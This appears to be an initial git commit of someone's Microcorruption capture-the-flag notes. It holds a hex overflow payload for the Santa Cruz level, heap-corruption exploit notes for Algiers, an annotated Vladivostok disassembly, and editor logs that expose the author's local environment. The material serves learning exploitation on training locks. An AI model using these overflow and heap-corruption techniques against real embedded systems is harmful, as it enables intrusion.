Initial Commit
commit
9281acc1eb
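--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,14 @@
+# Microcorruption save files
+Saves
+
+# Dependency and object files
+**/dep
+**/obj
+**/*.out
+
+# MSProbe - https://github.com/Swiftloke/MSProbe
+MSProbe
+
+# Python cache
+__pycache__
+**/__pycache__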
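Review bot: The ignore list stops at `Saves`, `**/dep`, `**/obj`, `**/*.out`, `MSProbe` and `__pycache__`, yet the same commit checks in `.vscode/targets.log` and `.vscode/dryrun.log`, editor-generated `make -p` dumps that record the whole environment of the build host (`PATH`, `HOME`, `USER`, `VSCODE_SERVER_TAR`, the `VSCODE_IPC_HOOK_CLI` socket path, WSL interop paths). Add `.vscode/` (or at minimum `.vscode/*.log`) here and drop the already-added logs from the tree; once pushed they remain in history even after a later delete, so this is worth fixing before the first push. As a minor point, `__pycache__` without a slash already matches at any depth, so the `**/__pycache__` line is redundant.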
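--- a/.vscode/configurationCache.log
+++ b/.vscode/configurationCache.log
@@ -0,0 +1 @@
+{"buildTargets":[],"launchTargets":[],"customConfigurationProvider":{"workspaceBrowse":{"browsePath":[],"compilerArgs":[]},"fileIndex":[]}}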
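--- a/.vscode/dryrun.log
+++ b/.vscode/dryrun.log
@@ -0,0 +1,6 @@
+make --dry-run --keep-going --print-directory
+make: Entering directory '/mnt/c/Users/valli/Documents/MicroCorruption'
+make: Leaving directory '/mnt/c/Users/valli/Documents/MicroCorruption'
+
+make: *** No targets specified and no makefile found. Stop.
+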
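--- a/.vscode/settings.json
+++ b/.vscode/settings.json
@@ -0,0 +1,3 @@
+{
+"makefile.extensionOutputFolder": "./.vscode"
+}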
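--- a/.vscode/targets.log
+++ b/.vscode/targets.log
@@ -0,0 +1,242 @@
+make all --print-data-base --no-builtin-variables --no-builtin-rules --question
+make: *** No rule to make target 'all'. Stop.
+
+# GNU Make 4.3
+# Built for x86_64-pc-linux-gnu
+# Copyright (C) 1988-2020 Free Software Foundation, Inc.
+# License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+# This is free software: you are free to change and redistribute it.
+# There is NO WARRANTY, to the extent permitted by law.
+
+# Make data base, printed on Sat Aug 6 01:00:38 2022
+
+# Variables
+
+# environment
+LC_ALL = C
+# environment
+PULSE_SERVER = /mnt/wslg/PulseServer
+# environment
+WSLENV = VSCODE_WSL_EXT_LOCATION/up:VSCODE_SERVER_TAR/up
+# environment
+VSCODE_CWD = /mnt/c/Users/valli/AppData/Local/Programs/Microsoft VS Code
+# environment
+NVM_DIR = /home/val/.nvm
+# default
+MAKE_COMMAND := make
+# environment
+VSCODE_HANDLES_SIGPIPE = true
+# automatic
+@D = $(patsubst %/,%,$(dir $@))
+# environment
+VSCODE_HANDLES_UNCAUGHT_ERRORS = true
+# default
+.VARIABLES :=
+# environment
+PWD = /mnt/c/Users/valli/Documents/MicroCorruption
+# automatic
+%D = $(patsubst %/,%,$(dir $%))
+# environment
+LSCOLORS = Gxfxcxdxbxegedabagacad
+# environment
+OLDPWD = /mnt/c/Users/valli/AppData/Local/Programs/Microsoft VS Code
+# automatic
+^D = $(patsubst %/,%,$(dir $^))
+# automatic
+%F = $(notdir $%)
+# environment
+NVM_INC = /home/val/.nvm/versions/node/v16.13.0/include/node
+# environment
+LANG = C
+# default
+.LOADED :=
+# default
+.INCLUDE_DIRS = /usr/include /usr/local/include /usr/include
+# makefile
+MAKEFLAGS = pqrR
+# environment
+DEVKITARM = /opt/devkitpro/devkitARM
+# makefile
+CURDIR := /mnt/c/Users/valli/Documents/MicroCorruption
+# environment
+APPLICATION_INSIGHTS_NO_DIAGNOSTIC_CHANNEL = true
+# automatic
+*D = $(patsubst %/,%,$(dir $*))
+# environment
+MFLAGS = -pqrR
+# default
+.SHELLFLAGS := -c
+# environment
+NVM_BIN = /home/val/.nvm/versions/node/v16.13.0/bin
+# environment
+WSL2_GUI_APPS_ENABLED = 1
+# environment
+WAYLAND_DISPLAY = wayland-0
+# automatic
++D = $(patsubst %/,%,$(dir $+))
+# makefile
+MAKEFILE_LIST :=
+# automatic
+@F = $(notdir $@)
+# environment
+ZSH = /home/val/.oh-my-zsh
+# automatic
+?D = $(patsubst %/,%,$(dir $?))
+# environment
+DEVKITPPC = /opt/devkitpro/devkitPPC
+# automatic
+*F = $(notdir $*)
+# automatic
+<D = $(patsubst %/,%,$(dir $<))
+# environment
+VSCODE_NLS_CONFIG = {"locale":"en","availableLanguages":{}}
+# default
+MAKE_HOST := x86_64-pc-linux-gnu
+# makefile
+SHELL = /bin/sh
+# default
+MAKECMDGOALS := all
+# environment
+SHLVL = 2
+# environment
+MAKELEVEL := 0
+# default
+MAKE = $(MAKE_COMMAND)
+# environment
+PATH = /home/val/.vscode-server/bin/da76f93349a72022ca4670c1b84860304616aaa2/bin/remote-cli:/home/val/.nvm/versions/node/v16.13.0/bin:/opt/devkitpro/tools/bin:/home/val/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/usr/lib/wsl/lib:/mnt/c/WINDOWS/system32:/mnt/c/WINDOWS:/mnt/c/WINDOWS/System32/Wbem:/mnt/c/WINDOWS/System32/WindowsPowerShell/v1.0/:/mnt/c/WINDOWS/System32/OpenSSH/:/mnt/c/Program Files/dotnet/:/mnt/c/Program Files/WireGuard/:/mnt/c/Program Files/Calibre2/:/mnt/c/ProgramData/chocolatey/bin:/mnt/c/Program Files/usbipd-win/:/mnt/c/Program Files/Git/cmd:/mnt/c/Program Files (x86)/GnuPG/bin:/mnt/c/Users/valli/AppData/Local/Programs/Python/Python310/Scripts/:/mnt/c/Users/valli/AppData/Local/Programs/Python/Python310/:/mnt/c/Python310/Scripts/:/mnt/c/Python310/:/mnt/c/Users/valli/AppData/Local/Microsoft/WindowsApps:/mnt/c/Users/valli/AppData/Local/Programs/Microsoft VS Code/bin:/mnt/c/Users/valli/Programs/platform-tools:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
+# default
+MAKEFILES :=
+# automatic
+^F = $(notdir $^)
+# automatic
+?F = $(notdir $?)
+# environment
+NAME = framework
+# environment
+DEVKITPRO = /opt/devkitpro
+# environment
+VSCODE_SERVER_TAR = /mnt/c/Users/valli/AppData/Local/Temp/vscode-remote-wsl/da76f93349a72022ca4670c1b84860304616aaa2/vscode-server-stable-linux-x64.tar.gz
+# environment
+HOSTTYPE = x86_64
+# environment
+LS_COLORS = rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
+# automatic
++F = $(notdir $+)
+# environment
+LESS = -R
+# environment
+WSL_INTEROP = /run/WSL/13_interop
+# 'override' directive
+GNUMAKEFLAGS :=
+# environment
+LOGNAME = val
+# environment
+VSCODE_WSL_EXT_LOCATION = /mnt/c/Users/valli/.vscode/extensions/ms-vscode-remote.remote-wsl-0.66.3
+# makefile
+.DEFAULT_GOAL :=
+# environment
+DISPLAY = :0
+# environment
+USER = val
+# default
+MAKE_VERSION := 4.3
+# environment
+PAGER = less
+# environment
+_ = /usr/sbin/make
+# environment
+XDG_RUNTIME_DIR = /mnt/wslg/runtime-dir
+# environment
+LC_CTYPE =
+# environment
+VSCODE_IPC_HOOK_CLI = /mnt/wslg/runtime-dir/vscode-ipc-84aeb54a-2a55-4133-82f0-e02f6af1e278.sock
+# environment
+NVM_CD_FLAGS = -q
+# environment
+VSCODE_AMD_ENTRYPOINT = vs/workbench/api/node/extensionHostProcess
+# environment
+HOME = /home/val
+# environment
+ELECTRON_RUN_AS_NODE = 1
+# environment
+TERM = xterm-256color
+# default
+.RECIPEPREFIX :=
+# automatic
+<F = $(notdir $<)
+# default
+SUFFIXES :=
+# environment
+WSL_DISTRO_NAME = Manjaro
+# default
+.FEATURES := target-specific order-only second-expansion else-if shortest-stem undefine oneshell nocomment grouped-target extra-prereqs archives jobserver output-sync check-symlink guile load
+# variable set hash-table stats:
+# Load=79/1024=8%, Rehash=0, Collisions=1/106=1%
+
+# Pattern-specific Variable Values
+
+# No pattern-specific variable values.
+
+# Directories
+
+# . (device 72, inode 7881299347912784): 24 files, no impossibilities.
+
+# 24 files, no impossibilities in 1 directories.
+
+# Implicit Rules
+
+# No implicit rules.
+
+# Files
+
+# Not a target:
+Makefile:
+# Implicit rule search has been done.
+# File does not exist.
+# File has been updated.
+# Failed to be updated.
+
+# Not a target:
+.DEFAULT:
+# Implicit rule search has not been done.
+# Modification time never checked.
+# File has not been updated.
+
+# Not a target:
+all:
+# Command line target.
+# Implicit rule search has been done.
+# File does not exist.
+# File has not been updated.
+
+# Not a target:
+makefile:
+# Implicit rule search has been done.
+# File does not exist.
+# File has been updated.
+# Failed to be updated.
+
+# Not a target:
+GNUmakefile:
+# Implicit rule search has been done.
+# File does not exist.
+# File has been updated.
+# Failed to be updated.
+
+# files hash-table stats:
+# Load=6/1024=1%, Rehash=0, Collisions=0/15=0%
+# VPATH Search Paths
+
+# No 'vpath' search paths.
+
+# No general ('VPATH' variable) search path.
+
+# strcache buffers: 1 (0) / strings = 32 / storage = 508 B / avg = 15 B
+# current buf: size = 8162 B / used = 508 B / count = 32 / avg = 15 B
+
+# strcache performance: lookups = 35 / hit rate = 8%
+# hash-table stats:
+# Load=32/8192=0%, Rehash=0, Collisions=0/35=0%
+# Finished Make data base on Sat Aug 6 01:00:38 2022
+
+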
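--- a/09 - Santa Cruz/Santa Cruz notes
+++ b/09 - Santa Cruz/Santa Cruz notes
@@ -0,0 +1,6 @@
+
+password:
+passwordpassword1
+
+username:
+2020202020202020202020202020202020017f20202020202020202020202020202020202020202020204a44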
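--- a/13 - Algiers/Algiers notes
+++ b/13 - Algiers/Algiers notes
@@ -0,0 +1,50 @@
+
+//[*prev][*next][size:15][final:1]
+
+struct block {
+block * prev:16;
+block * next:16;
+short len :15;
+bool end :01;
+};
+
+If the username is "usernameusername" + prev + &password + '0001'
+then the password can be a fake block w/ a next pointer to an
+
+2408: 0824 1e24 2100 # Block
+2408[0] 0824: 2408 == (prev pointer?)
+2408[2] 1e24: 241e == next pointer
+2408[4] 2100: 0021 == 2 * block_size + 1
+2408[6] data[0..bs]
+
+Heap (0 malloc)
+2400: 0824 0010 0100 0000 0000 0000 0000 0000 .$..............
+Word 1: 2408 == &(heap_start)
+Word 2: 1000 == total heap BYTES
+Word 3: 0001 == needs_initialize
+Word 4: 0000 == ???
+
+
+Heap (1 malloc)
+2400: 0824 0010 0000 0000 0824 1e24 2100 0000 .$.......$.$!...
+2410: 0000 0000 0000 0000 0000 0000 0000 0824 ...............$
+2420: 0824 c81f 0000 0000 0000 0000 0000 0000 .$..............
+
+2408: 0824 1e24 2100 # Block
+2408[0] 0824: 2408 == (prev pointer?)
+2408[2] 1e24: 241e == next pointer
+2408[4] 2100: 0021 == 2 * block_size + 1
+2408[6] data[0..bs]
+
+241e: 0824 0824 c81f # End block
+241e[0] 0824: prev pointer
+241e[2] 0824: next pointer
+241e[4] c81f: 1fc8 == 2*(size of free space)
+241e[6] free space
+
+Heap (2 malloc)
+2400: 0824 0010 0000 0000 0824 1e24 2100 0000 .$.......$.$!...
+2410: 0000 0000 0000 0000 0000 0000 0000 0824 ...............$
+2420: 3424 2100 0000 0000 0000 0000 0000 0000 4$!.............
+2430: 0000 0000 1e24 0824 9c1f 0000 0000 0000 .....$.$........
+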
753
14 - Vladivostok/Vladivostok.asm
Normal file
753
14 - Vladivostok/Vladivostok.asm
Normal file
@ -0,0 +1,753 @@
|
|||||||
|
.msp430
|
||||||
|
0010 <__trap_interrupt>
|
||||||
|
0010: 3041 ret
|
||||||
|
|
||||||
|
; Only runs once
|
||||||
|
4400 <__init_stack>
|
||||||
|
4400: 3140 0044 mov #0x4400, sp
|
||||||
|
4404 <__low_level_init>
|
||||||
|
4404: 1542 5c01 mov &0x015c, r5
|
||||||
|
4408: 75f3 and.b #-0x1, r5
|
||||||
|
440a: 35d0 085a bis #0x5a08, r5
|
||||||
|
440e <__do_copy_data>
|
||||||
|
440e: 3f40 0000 clr r15
|
||||||
|
4412: 0f93 tst r15
|
||||||
|
4414: 0724 jz $+0x10 <__do_clear_bss+0x0>
|
||||||
|
4416: 8245 5c01 mov r5, &0x015c
|
||||||
|
441a: 2f83 decd r15
|
||||||
|
; 4170 contains only zeroes
|
||||||
|
441c: 9f4f 704a 0024 mov 0x4a70(r15), 0x2400(r15)
|
||||||
|
4422: f923 jnz $-0xc <__do_copy_data+0x8>
|
||||||
|
4424 <__do_clear_bss>
|
||||||
|
4424: 3f40 3200 mov #0x32, r15
|
||||||
|
4428: 0f93 tst r15
|
||||||
|
442a: 0624 jz $+0xe <main+0x0>
|
||||||
|
442c: 8245 5c01 mov r5, &0x015c
|
||||||
|
4430: 1f83 dec r15
|
||||||
|
4432: cf43 0024 mov.b #0x0, 0x2400(r15)
|
||||||
|
4436: fa23 jnz $-0xa <__do_clear_bss+0x8>
|
||||||
|
|
||||||
|
rand_base_0x038: <main>
|
||||||
|
main:
|
||||||
|
4438: b012 1c4a call #0x4a1c <rand> ; get rand_base
|
||||||
|
443c: 0b4f mov r15, r11
|
||||||
|
443e: 3bf0 fe7f and #0x7ffe, r11
|
||||||
|
4442: 3b50 0060 add #0x6000, r11
|
||||||
|
4446: b012 1c4a call #0x4a1c <rand>
|
||||||
|
444a: 0a4f mov r15, r10
|
||||||
|
; Copy 0x1000 bytes from 0x4400 to rand_base
|
||||||
|
444c: 3012 0010 push #0x1000
|
||||||
|
4450: 3012 0044 push #0x4400
|
||||||
|
4454: 0b12 push r11
|
||||||
|
4456: b012 e849 call #0x49e8 <_memcpy>
|
||||||
|
445a: 3150 0600 add #0x6, sp
|
||||||
|
|
||||||
|
445e: 0f4a mov r10, r15
|
||||||
|
4460: 3ff0 fe0f and #0xffe, r15
|
||||||
|
4464: 0e4b mov r11, r14
|
||||||
|
4466: 0e8f sub r15, r14
|
||||||
|
4468: 3e50 00ff add #0xff00, r14
|
||||||
|
446c: 0d4b mov r11, r13
|
||||||
|
446e: 3d50 5c03 add #0x35c, r13
|
||||||
|
4472: 014e mov r14, sp
|
||||||
|
4474: 0f4b mov r11, r15
|
||||||
|
4476: 8d12 call r13
|
||||||
|
|
||||||
|
rand_base_0x078: <__stop_progExec__>
|
||||||
|
4478: 32d0 f000 bis #0xf0, sr
|
||||||
|
447c: fd3f jmp $-0x4 <__stop_progExec__+0x0>
|
||||||
|
|
||||||
|
rand_base_0x07e: <__ctors_end>
|
||||||
|
447e: 3040 6e4a br #0x4a6e <_unexpected_>
|
||||||
|
|
||||||
|
rand_base_0x082: <_aslr_main>
|
||||||
|
_aslr_main: ;! args: r15
|
||||||
|
push r11
|
||||||
|
push r10
|
||||||
|
; Eight more bytes on stack
|
||||||
|
sub #0x8, sp
|
||||||
|
mov r15, r12
|
||||||
|
add #0x36a, r12
|
||||||
|
mov r12, 0x2(sp)
|
||||||
|
|
||||||
|
clr r14
|
||||||
|
__delete_code_loop:
|
||||||
|
mov.b #0x0, 0x4400(r14)
|
||||||
|
inc r14
|
||||||
|
cmp #0x1000, r14
|
||||||
|
jnz $-0xa <__delete_code_loop>
|
||||||
|
|
||||||
|
; "Username (8 char max):" -> 0x2402
|
||||||
|
mov.b #0x55, &0x2402
|
||||||
|
mov.b #0x73, &0x2403
|
||||||
|
mov.b #0x65, &0x2404
|
||||||
|
mov.b #0x72, &0x2405
|
||||||
|
mov.b #0x6e, &0x2406
|
||||||
|
mov.b #0x61, &0x2407
|
||||||
|
mov.b #0x6d, &0x2408
|
||||||
|
mov.b #0x65, &0x2409
|
||||||
|
mov.b #0x20, &0x240a
|
||||||
|
mov.b #0x28, &0x240b
|
||||||
|
mov.b #0x38, &0x240c
|
||||||
|
mov.b #0x20, &0x240d
|
||||||
|
mov.b #0x63, &0x240e
|
||||||
|
mov.b #0x68, &0x240f
|
||||||
|
mov.b #0x61, &0x2410
|
||||||
|
mov.b #0x72, &0x2411
|
||||||
|
mov.b #0x20, &0x2412
|
||||||
|
mov.b #0x6d, &0x2413
|
||||||
|
mov.b #0x61, &0x2414
|
||||||
|
mov.b #0x78, &0x2415
|
||||||
|
mov.b #0x29, &0x2416
|
||||||
|
mov.b #0x3a, &0x2417
|
||||||
|
mov.b #0x0, &0x2418
|
||||||
|
mov #0x17, &0x2400
|
||||||
|
mov #0x2402, r14
|
||||||
|
clr r11
|
||||||
|
jmp $+0x22 <print_uname_string>
|
||||||
|
; Print the uname string bytewise
|
||||||
|
__print_uname_string_l:
|
||||||
|
inc r14
|
||||||
|
sxt r13
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push r11
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r11, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
print_uname_string:
|
||||||
|
mov.b @r14, r13
|
||||||
|
tst.b r13
|
||||||
|
jnz $-0x24 <__print_uname_string_l>
|
||||||
|
|
||||||
|
; Print newline
|
||||||
|
__print_line_feed__1: ; putchar
|
||||||
|
clr r14
|
||||||
|
mov #0xa, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;* Print ">>"
|
||||||
|
__print_less_than__1: ; putchar
|
||||||
|
add #0x34, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
__print_less_than__2: ; putchar
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;! Gets 8 bytes of user input -> &0x2426
|
||||||
|
__get_uname_string: ; getsn
|
||||||
|
mov #0x8, r10
|
||||||
|
mov #0x2426, r11
|
||||||
|
mov #0x2, r13
|
||||||
|
push r10
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10 ; INT (2, 0x2426, 0x8)
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
|
||||||
|
; Calls r15+0x36a
|
||||||
|
mov.b r14, &0x242e
|
||||||
|
push r11
|
||||||
|
call r12 ;! PRINTF???
|
||||||
|
incd sp
|
||||||
|
mov r11, r15
|
||||||
|
|
||||||
|
jmp $+0x8 <clsb_a>
|
||||||
|
__clsb_a_loop:
|
||||||
|
mov.b #0x0, 0x0(r15)
|
||||||
|
inc r15
|
||||||
|
clsb_a:
|
||||||
|
cmp #0x2432, r15
|
||||||
|
jnz $-0xa <__clsb_a_loop>
|
||||||
|
|
||||||
|
;! "Password:" -> 0x2403
|
||||||
|
mov.b #0xa, &0x2402 ; length 10
|
||||||
|
mov.b #0x50, &0x2403
|
||||||
|
mov.b #0x61, &0x2404
|
||||||
|
mov.b #0x73, &0x2405
|
||||||
|
mov.b #0x73, &0x2406
|
||||||
|
mov.b #0x77, &0x2407
|
||||||
|
mov.b #0x6f, &0x2408
|
||||||
|
mov.b #0x72, &0x2409
|
||||||
|
mov.b #0x64, &0x240a
|
||||||
|
mov.b #0x3a, &0x240b
|
||||||
|
mov.b #0x0, &0x240c
|
||||||
|
mov #0x2402, r14 ; r14 = &length
|
||||||
|
|
||||||
|
; puts ("Password:")
|
||||||
|
clr r12
|
||||||
|
jmp $+0x22 <print_passwd_string>
|
||||||
|
__print_passwd_string:
|
||||||
|
inc r14
|
||||||
|
sxt r13
|
||||||
|
push r12
|
||||||
|
push r13
|
||||||
|
push r12
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r12, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10 ; INT (0, r13)
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
print_passwd_string:
|
||||||
|
mov.b @r14, r13
|
||||||
|
tst.b r13
|
||||||
|
jnz $-0x24 <__print_passwd_string>
|
||||||
|
clr r14
|
||||||
|
mov #0xa, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;! Get password from user -> STACK
|
||||||
|
__get_pass_string: ; getsn
|
||||||
|
mov sp, r11
|
||||||
|
add #0x4, r11
|
||||||
|
mov #0x14, r12
|
||||||
|
mov #0x2, r13
|
||||||
|
push r12
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10 ; INT (2, )
|
||||||
|
0x2aa:
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
;! Check password with HSM-2
|
||||||
|
__check_password: ; conditional_unlock_door
|
||||||
|
add #0x7c, r13
|
||||||
|
mov sp, r12
|
||||||
|
push r12
|
||||||
|
push r11
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
|
||||||
|
; "Wrong!" -> 0x2402
|
||||||
|
mov.b #0x57, &0x2402
|
||||||
|
mov.b #0x72, &0x2403
|
||||||
|
mov.b #0x6f, &0x2404
|
||||||
|
mov.b #0x6e, &0x2405
|
||||||
|
mov.b #0x67, &0x2406
|
||||||
|
mov.b #0x21, &0x2407
|
||||||
|
mov.b r14, &0x2408 ; Hah, nice hint: r14 still 0
|
||||||
|
mov #0x7, &0x2400 ; length: 7
|
||||||
|
|
||||||
|
;* puts
|
||||||
|
mov #0x2402, r13
|
||||||
|
jmp $+0x22 <_aslr_main+0x2a2>
|
||||||
|
__print_wrong_string: ; puts ("Wrong!")
|
||||||
|
inc r13
|
||||||
|
sxt r12
|
||||||
|
push r14
|
||||||
|
push r12
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
print_wrong_string:
|
||||||
|
mov.b @r13, r12
|
||||||
|
tst.b r12
|
||||||
|
jnz $-0x24 <_aslr_main+0x282>
|
||||||
|
; print newline
|
||||||
|
clr r14
|
||||||
|
mov #0xa, r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
mov sp, r14
|
||||||
|
|
||||||
|
; r15 = ++r14
|
||||||
|
incd r14
|
||||||
|
push r14
|
||||||
|
pop r15
|
||||||
|
4754:
|
||||||
|
add #0x8, sp
|
||||||
|
pop r10
|
||||||
|
pop r11
|
||||||
|
ret
|
||||||
|
|
||||||
|
|
||||||
|
rand_base_0x35c: <aslr_main>
|
||||||
|
aslr_main:
|
||||||
|
475c: 0e4f mov r15, r14
|
||||||
|
475e: 3e50 8200 add #0x82, r14
|
||||||
|
4762: 8e12 call r14
|
||||||
|
; SR |= 0x00f0
|
||||||
|
4764: 32d0 f000 bis #0xf0, sr
|
||||||
|
4768: 3041 ret
|
||||||
|
|
||||||
|
|
||||||
|
aslr_base_0x36a: <printf>
|
||||||
|
printf:
|
||||||
|
; Save registers
|
||||||
|
push r11
|
||||||
|
push r10
|
||||||
|
push r9
|
||||||
|
push r8
|
||||||
|
push r7
|
||||||
|
push r6
|
||||||
|
push r4
|
||||||
|
; Create a new stack frame of 0xe bytes
|
||||||
|
mov sp, r4
|
||||||
|
add #0xe, r4
|
||||||
|
|
||||||
|
; Get the first argument
|
||||||
|
decd sp
|
||||||
|
mov 0x2(r4), r10
|
||||||
|
mov sp, -0x10(r4)
|
||||||
|
mov r10, r15
|
||||||
|
|
||||||
|
clr r14
|
||||||
|
jmp $+0x18 <__target_1> +3a
|
||||||
|
inc r15
|
||||||
|
cmp.b #0x25, r13
|
||||||
|
jnz $+0x10 <__target_1> +3a
|
||||||
|
cmp.b @r15, r13
|
||||||
|
jnz $+0x8 <__target_2> +36
|
||||||
|
__target_4:
|
||||||
|
inc r15
|
||||||
|
clr r13
|
||||||
|
jmp $+0x4 <__target_3> +38
|
||||||
|
__target_2:
|
||||||
|
mov #0x1, r13
|
||||||
|
add r13, r14
|
||||||
|
__target_3:
|
||||||
|
mov.b @r15, r13
|
||||||
|
tst.b r13
|
||||||
|
jnz $-0x1a <__target_4> +24
|
||||||
|
mov r14, r15
|
||||||
|
add r15, r15
|
||||||
|
incd r15
|
||||||
|
sub r15, sp
|
||||||
|
mov sp, r11
|
||||||
|
mov r4, r12
|
||||||
|
add #0x4, r12
|
||||||
|
mov sp, r15
|
||||||
|
clr r13
|
||||||
|
jmp $+0xc <printf+0x5e>
|
||||||
|
mov @r12, 0x0(r15)
|
||||||
|
inc r13
|
||||||
|
incd r15
|
||||||
|
incd r12
|
||||||
|
cmp r14, r13
|
||||||
|
jl $-0xc <printf+0x54>
|
||||||
|
clr r12
|
||||||
|
mov #0x9, r6
|
||||||
|
mov r12, r13
|
||||||
|
mov #0x25, r7
|
||||||
|
jmp $+0xf8 <printf+0x166>
|
||||||
|
inc r10
|
||||||
|
cmp.b #0x25, r15
|
||||||
|
jz $+0x26 <printf+0x9c>
|
||||||
|
inc r12
|
||||||
|
|
||||||
|
__target_1:
|
||||||
|
mov.b r15, r14
|
||||||
|
sxt r14
|
||||||
|
push r13
|
||||||
|
push r14
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
jmp $+0xcc <printf+0x166>
|
||||||
|
mov.b @r10, r14
|
||||||
|
cmp.b r15, r14
|
||||||
|
jnz $+0x22 <printf+0xc2>
|
||||||
|
inc r12
|
